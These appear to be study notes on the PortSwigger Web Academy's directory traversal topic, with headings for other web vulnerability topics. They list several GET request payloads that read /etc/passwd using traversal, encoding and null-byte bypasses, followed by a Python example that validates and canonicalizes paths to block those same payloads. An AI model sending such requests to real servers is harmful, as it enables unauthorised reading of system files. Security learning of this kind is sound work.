PortSwigger Web Academy

SQL Injection

Authentication

Directory Traversal

https://portswigger.net/web-security/file-path-traversal

Summary

Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application.

https://gchq.github.io/CyberChef/

# Most basic case
GET /image?filename=../../../../../../etc/passwd HTTP/2
GET /image?filename=/etc/passwd HTTP/2

# Simple bypasses
GET /image?filename=//....//....//....//etc//passwd HTTP/2
# Double URL encoding
GET /image?filename=%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd HTTP/2
# Null byte to bypass extension check
GET /image?filename=../../../../../../etc/passwd%00.jpg HTTP/2

Fix

  • Validate user input
  • Canonicalize the requested path and only serve files that resolve inside the intended root directory
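
Added example (not part of the original notes): both fixes applied in Python to the request values listed above, as the application sees them after the server has URL-decoded the query string once. `BASE_DIR`, `ALLOWED_NAME` and the function names are assumptions made for illustration.

```python
import os
import re

BASE_DIR = "/var/www/images"  # assumed image root, not taken from the page
# Allow-list: one path component, known image extension, nothing else.
ALLOWED_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(?:jpg|png|gif)")

# Request values from the notes above, after one round of URL decoding.
PAGE_PAYLOADS = [
    "../../../../../../etc/passwd",
    "/etc/passwd",
    "//....//....//....//etc//passwd",
    "%2E%2E%2F" * 7 + "etc%2Fpasswd",  # double-encoded form, one layer removed
    "../../../../../../etc/passwd\x00.jpg",
]

def is_inside_base(filename, base_dir=BASE_DIR):
    """Canonicalize base + filename and check the result stays under base."""
    if "\x00" in filename:  # a null byte is never valid in a file name
        return False
    base = os.path.realpath(base_dir)
    # realpath collapses "..", repeated slashes and symlinks; an absolute
    # filename replaces base in os.path.join and fails the check below.
    target = os.path.realpath(os.path.join(base, filename))
    return os.path.commonpath([base, target]) == base

def resolve_image_path(filename, base_dir=BASE_DIR):
    """Return the canonical path to serve, or None if the request is rejected."""
    # Fix 1: validate input. Anything with "/", "%", "\x00" or ".." fails here.
    if not ALLOWED_NAME.fullmatch(filename):
        return None
    # Fix 2: canonical-root check, kept as a second layer (it also catches
    # symlinks inside the image directory that point outside it).
    if not is_inside_base(filename, base_dir):
        return None
    return os.path.realpath(os.path.join(os.path.realpath(base_dir), filename))

if __name__ == "__main__":
    for value in PAGE_PAYLOADS + ["cat.jpg"]:
        print(repr(value[:40]), "->", resolve_image_path(value))
```

The still-encoded value passes `is_inside_base` on its own because it is just an odd file name at that point, so the allow-list has to run on the value after all decoding the application performs.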

Command Injection

Business Logic Vulnerabilities

Information Disclosure

Access Control

File Upload Vulnerabilities

Server-Side Request Forgery SSRF

XXE Injection

Cross Site Scripting XSS

Cross Site Request Forgery CSRF

Cross Origin Resource Sharing CORS

Clickjacking

DOM Based Vulnerabilities

WebSockets

Insecure Deserialization

Server Side Template Injection SSTI

Web Cache Poisoning

HTTP Host Header Attacks

HTTP Request Smuggling

OAuth Authentication

JWT Attack

Prototype Pollution